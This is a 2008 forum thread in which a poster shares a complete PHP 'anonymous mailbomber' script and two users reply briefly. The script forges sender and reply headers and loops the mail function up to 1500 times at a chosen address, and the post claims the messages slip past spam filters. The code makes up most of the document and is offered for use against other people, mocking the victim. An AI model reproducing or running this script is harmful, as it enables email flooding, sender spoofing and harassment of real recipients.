LOOL mail bombing

Agnostic Bear · 01-03-2008, 09:47 PM

Originally Posted by Tom743

found this script, you can bomb someones email, and the emails dont come up in spam box

PHP Code:


<?php
// Script by Guido Chorus.
session_start();
$_SESSION['checked'] = 1; // no login needed!
$sUser = "demo";
$sPass = "1234";
function validateEmail($pEmail) {
    ereg("([_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*)", $pEmail, $regs);
    if($regs[1] == $pEmail) {
        return TRUE;
    }
    return FALSE;
}
$action = (isset(
$_POST['action']) && is_string(
$_POST['action']) && strlen(
$_POST['action'])
>= 1)
? $_POST['action'] : -1;
echo "<font size='6'><b>FREE anonymous mailbomber :)</b></font><br><font size='4' color='gray'>annoy your friends..</font><br><br>";
if($_SESSION['checked'] == 1) {
    // This user is validated
    if($action == -1) {
        ?>
        <form input='' method='POST'>
        <input type='hidden' name='action' value='sended'>
        Email to (address):<br /> 
        <input name='to' type='text'><br />
        Your Real Name ;) :<br />
        <input name='realname' type='text'><br />
        Email from(reply address?):<br />
        <input name='from' type='text'><br />
        Subject:<br />
        <input name='subject' type='text'><br />
        dont tick: <input name='****back' type='checkbox'><br />
        Msg:<br />
        <textarea name='msg' rows='10' cols='60'></textarea><br />
        Number of bombs:<br />
        <select size="1" name="num">
            <option value="1">(1) Anonymous mail :)</option>
            <option value="3">(3) mwah</option>
            <option value="10">(10) could be more</option>
            <option value="50">(50) hehe</option>
            <option value="100">(100) nice</option>
            <option value="150">(150) painfull</option>
            <option value="300">(300) Whooppssssss!!!!</option>
            <option value="1500">(1500) Domina! o//</option>
        </select><br /><br />
        <input type='submit' value='BOMB UM!!'>
        </form>
        <?php
    }
    else {
        $to = $_POST['to'];
        $realname = $_POST['realname'];
        $from = $_POST['from'];
        $subject = $_POST['subject'];
        $msg = $_POST['msg'];
        $num = $_POST['num'];
        $****back = $_POST['****back'];
        if($to != "" && $realname != "" && $from != "" && $subject != "" && $msg != "" && $num != "" && validateEmail($from) && validateEmail($to)) {
            $message = "";
            $headers = "From: $realname<$from>\n";
            $headers .= "Reply-To: <$from>\n";
            $headers .= "MIME-Version: 1.0\n";
            $headers .= "Content-Type: multipart/related;type=\"multipart/alternative\"; boundary=\"----=MIME_BOUNDRY_main_message\"\n";
            $headers .= "X-Sender: $from<$from>\n";
            $headers .= "X-Mailer: PHP5\n"; //mailer
            $headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
            $headers .= "Return-Path: <$from>\n";
            $headers .= "This is a multi-part message in MIME format.\n";
            $headers .= "------=MIME_BOUNDRY_main_message \n";
            $headers .= "Content-Type: multipart/alternative; boundary=\"----=MIME_BOUNDRY_message_parts\"\n";
            $message == "";
            $message .= "------=MIME_BOUNDRY_message_parts\n";
            $message .= "Content-Type: text/html;\n    charset=\"iso-8859-1\"\n";
            $message .= "Content-Transfer-Encoding: quoted-printable\n";
            $message .= "\n";
            $message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
            $message .= "<HTML><BODY><FONT FACE=VERDANA>\n";
            $message .= $msg;
            if($****back == "on") {
                $message .= "<br><br><br>**** back at: <a href='http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php'>http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php</a> :)";
            }
            for ($i = 0; $i < $num; $i++) {
                mail($to,$subject,$message,$headers);
                echo $i + 1 . " times bombed, muhahaha :D :D :D !!11!!!one!!!!eleven!!!111!!!<br>\n";
            }            
            echo "<br><br><a href='". $_SERVER['PHP_SELF'] ."'><b>Send another one! Click here...</b></a>";
            echo "<meta http-equiv=\"Refresh\" content=\"90; URL=''\" />";
        }
        else {
            echo "Every field is required or an invalid email address (from and to).";
            echo "<meta http-equiv=\"Refresh\" content=\"4; URL=''\" />";
        }
    }
}
else {
    // Needs to login or check.
    if($action == "checkLogin") {
        $user = (isset(
        $_POST['user']) && is_string(
        $_POST['user']) && strlen(
        $_POST['user'])
        >= 1)
        ? $_POST['user'] : -1;
        $pass = (isset(
        $_POST['pass']) && is_string(
        $_POST['pass']) && strlen(
        $_POST['pass'])
        >= 1)
        ? $_POST['pass'] : -1;
        if($user != -1 && $pass != -1) {
            if($sUser == $user && $sPass == $pass) {
                $_SESSION['checked'] = 1;
            }
        }
        echo "<meta http-equiv=\"Refresh\" content=\"0; URL=''\" />";
    }
    else {
        ?>
        <form action="" method='POST'>
        <input type='hidden' name='action' value='checkLogin'>
        Username:<br />
        <input type="text" name="user" value="demo"><br />
        Password:<br />
        <input type="password" name="pass" value="1234"><br />
        <input type='submit' value='login'>
        </form>
        <?php
    }
}
?>

Not very nice when you're on the receiving end.

Say... what's your email anyway?

Decode · 01-03-2008, 09:55 PM

Originally Posted by Lolcopters

Not very nice when you're on the receiving end.

Say... what's your email anyway?

bomb me all u like. On hotmail you can report as phishing scam

Thread: LOOL mail bombing

Thread Tools

Posting Permissions